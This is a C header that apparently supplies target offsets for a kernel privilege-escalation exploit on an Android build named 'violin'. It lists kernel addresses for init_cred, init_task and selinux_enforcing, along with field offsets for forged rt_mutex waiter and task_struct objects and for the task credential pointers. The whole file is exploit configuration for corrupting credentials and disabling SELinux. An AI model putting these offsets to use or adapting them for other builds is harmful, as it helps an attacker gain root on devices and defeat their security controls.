/* Generated from violin same-build rooted kallsyms + BTF; static offsets only. */
#ifndef TARGET_H
#define TARGET_H

#define KIMAGE_TEXT_BASE 0xffffffc080000000ULL
#define P0_PAGE_OFFSET 0xffffff8000000000ULL
#define P0_PHYS_OFFSET 0x0ULL
#define P0_KERNEL_PHYS_LOAD 0x00210000ULL
#define PSELECT_WAITER_WORD_SHIFT 0

/* Image-relative addresses derived from rooted ZIP, never runtime addresses. */
#define INIT_TASK (KIMAGE_TEXT_BASE + 0x020de280ULL)
#define INIT_CRED (KIMAGE_TEXT_BASE + 0x020f0548ULL)
#define ENTRY_TASK (KIMAGE_TEXT_BASE + 0x02096328ULL)
#define PER_CPU_OFFSET (KIMAGE_TEXT_BASE + 0x020cb658ULL)
#define ROOT_TASK_GROUP (KIMAGE_TEXT_BASE + 0x022d4580ULL)
#define SELINUX_ENFORCING (KIMAGE_TEXT_BASE + 0x02315f68ULL)

#define SLIDE_NFULNL_LOGGER_IMAGE (KIMAGE_TEXT_BASE + 0x020d2270ULL)
#define SLIDE_LOGGERS_0_1_IMAGE (KIMAGE_TEXT_BASE + 0x020d21b8ULL)
#define SLIDE_RANDOM_BOOT_ID_DATA_IMAGE (KIMAGE_TEXT_BASE + 0x02336f58ULL)
#define SLIDE_INIT_TASK_IMAGE INIT_TASK
#define SLIDE_ROOT_TASK_GROUP_IMAGE ROOT_TASK_GROUP

#define WAITER_TREE_ENTRY_OFF 0x00
#define WAITER_PI_TREE_ENTRY_OFF 0x28
#define WAITER_TASK_OFF 0x50
#define WAITER_LOCK_OFF 0x58
#define WAITER_WAKE_STATE_OFF 0x60
#define WAITER_PRIO_OFF 0x18
#define WAITER_DEADLINE_OFF 0x20
#define WAITER_WW_CTX_OFF 0x68

#define FAKE_WAITER_TREE_PRIO_OFF 0x18
#define FAKE_WAITER_TREE_DEADLINE_OFF 0x20
#define FAKE_WAITER_PI_TREE_ENTRY_OFF 0x28
#define FAKE_WAITER_PI_TREE_PRIO_OFF 0x40
#define FAKE_WAITER_PI_TREE_DEADLINE_OFF 0x48
#define FAKE_WAITER_TASK_OFF 0x50
#define FAKE_WAITER_LOCK_OFF 0x58
#define FAKE_WAITER_WAKE_STATE_OFF 0x60
#define FAKE_WAITER_WW_CTX_OFF 0x68

#define FAKE_TASK_USAGE_OFF 0x40
#define FAKE_TASK_PRIO_OFF 0x84
#define FAKE_TASK_NORMAL_PRIO_OFF 0x8c
#define FAKE_TASK_TASK_GROUP_OFF 0x348
#define FAKE_TASK_PI_LOCK_OFF 0x90c
#define FAKE_TASK_PI_WAITERS_OFF 0x920
#define FAKE_TASK_PI_TOP_TASK_OFF 0x930
#define FAKE_TASK_PI_BLOCKED_ON_OFF 0x938
#define FAKE_TASK_UCLAMP_REQ_OFF 0x350
#define FAKE_TASK_UCLAMP_OFF 0x358

#define TASK_REAL_CRED_OFF 0x818
#define TASK_CRED_OFF 0x820
#endif
